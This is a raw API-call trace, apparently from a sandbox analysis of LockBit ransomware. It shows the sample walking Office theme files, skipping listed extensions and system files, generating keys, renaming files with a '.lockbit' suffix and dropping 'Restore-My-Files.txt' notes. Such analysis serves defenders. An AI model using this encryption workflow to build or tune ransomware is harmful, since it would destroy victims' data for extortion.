[0194.136] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.136] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.137] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.137] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Clarity.eftx") returned 1 [0194.138] lstrcmpiW (lpString1="ntldr", lpString2="Clarity.eftx") returned 1 [0194.138] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Clarity.eftx") returned 1 [0194.138] lstrcmpiW (lpString1="bootsect.bak", lpString2="Clarity.eftx") returned -1 [0194.138] lstrcmpiW (lpString1="autorun.inf", lpString2="Clarity.eftx") returned -1 [0194.138] lstrcmpiW (lpString1="thumbs.db", lpString2="Clarity.eftx") returned 1 [0194.138] lstrcmpiW (lpString1="iconcache.db", lpString2="Clarity.eftx") returned 1 [0194.138] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.138] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx") returned=".eftx" [0194.138] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.138] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.138] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.138] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.138] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.138] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.138] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.138] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.138] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.139] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.139] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.139] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.139] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.139] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.139] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.139] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.lockbit") returned 88 [0194.139] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0194.140] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.140] malloc (_Size=0x40068) returned 0x1ff1e60 [0194.140] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=32818) returned 1 [0194.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0194.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0194.141] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0194.147] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.147] malloc (_Size=0xc6) returned 0x1fa2ed8 [0194.147] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0194.148] free (_Block=0x1fa2ed8) [0194.148] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.148] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.148] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.148] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6db46700, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a01840, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x6db46700, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x825e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Composite.eftx", cAlternateFileName="COMPOS~1.EFT")) returned 1 [0194.148] lstrcmpiW (lpString1=".", lpString2="Composite.eftx") returned -1 [0194.148] lstrcmpiW (lpString1="..", lpString2="Composite.eftx") returned -1 [0194.148] PathFindExtensionW (pszPath="Composite.eftx") returned=".eftx" [0194.148] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.148] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.148] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.148] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.148] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.149] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.149] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Composite.eftx") returned 1 [0194.150] lstrcmpiW (lpString1="ntldr", lpString2="Composite.eftx") returned 1 [0194.150] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Composite.eftx") returned 1 [0194.150] lstrcmpiW (lpString1="bootsect.bak", lpString2="Composite.eftx") returned -1 [0194.150] lstrcmpiW (lpString1="autorun.inf", lpString2="Composite.eftx") returned -1 [0194.150] lstrcmpiW (lpString1="thumbs.db", lpString2="Composite.eftx") returned 1 [0194.150] lstrcmpiW (lpString1="iconcache.db", lpString2="Composite.eftx") returned 1 [0194.150] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.150] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx") returned=".eftx" [0194.150] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.150] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.150] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.151] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.151] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.151] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.151] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.151] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.151] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.lockbit") returned 90 [0194.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0194.152] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0194.152] malloc (_Size=0x40068) returned 0x3df0008 [0194.152] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=533988) returned 1 [0194.152] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0194.153] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.153] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.153] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0194.153] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.158] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0194.158] malloc (_Size=0xca) returned 0x1fa2ed8 [0194.158] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0194.165] free (_Block=0x1fa2ed8) [0194.165] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0194.165] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0194.165] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0194.165] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2d000, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5a279a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xac2d000, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x5791, dwReserved0=0x0, dwReserved1=0x0, cFileName="Concourse.eftx", cAlternateFileName="CONCOU~1.EFT")) returned 1 [0194.165] lstrcmpiW (lpString1=".", lpString2="Concourse.eftx") returned -1 [0194.165] lstrcmpiW (lpString1="..", lpString2="Concourse.eftx") returned -1 [0194.165] PathFindExtensionW (pszPath="Concourse.eftx") returned=".eftx" [0194.165] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0194.165] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0194.165] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0194.166] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0194.166] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Concourse.eftx") returned 1 [0194.167] lstrcmpiW (lpString1="ntldr", lpString2="Concourse.eftx") returned 1 [0194.167] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Concourse.eftx") returned 1 [0194.167] lstrcmpiW (lpString1="bootsect.bak", lpString2="Concourse.eftx") returned -1 [0194.167] lstrcmpiW (lpString1="autorun.inf", lpString2="Concourse.eftx") returned -1 [0194.167] lstrcmpiW (lpString1="thumbs.db", lpString2="Concourse.eftx") returned 1 [0194.167] lstrcmpiW (lpString1="iconcache.db", lpString2="Concourse.eftx") returned 1 [0194.167] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0194.167] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx") returned=".eftx" [0194.167] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0194.167] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0194.167] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0194.168] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0194.168] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0194.168] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0194.168] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0194.168] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0194.168] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx.lockbit") returned 90 [0194.168] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 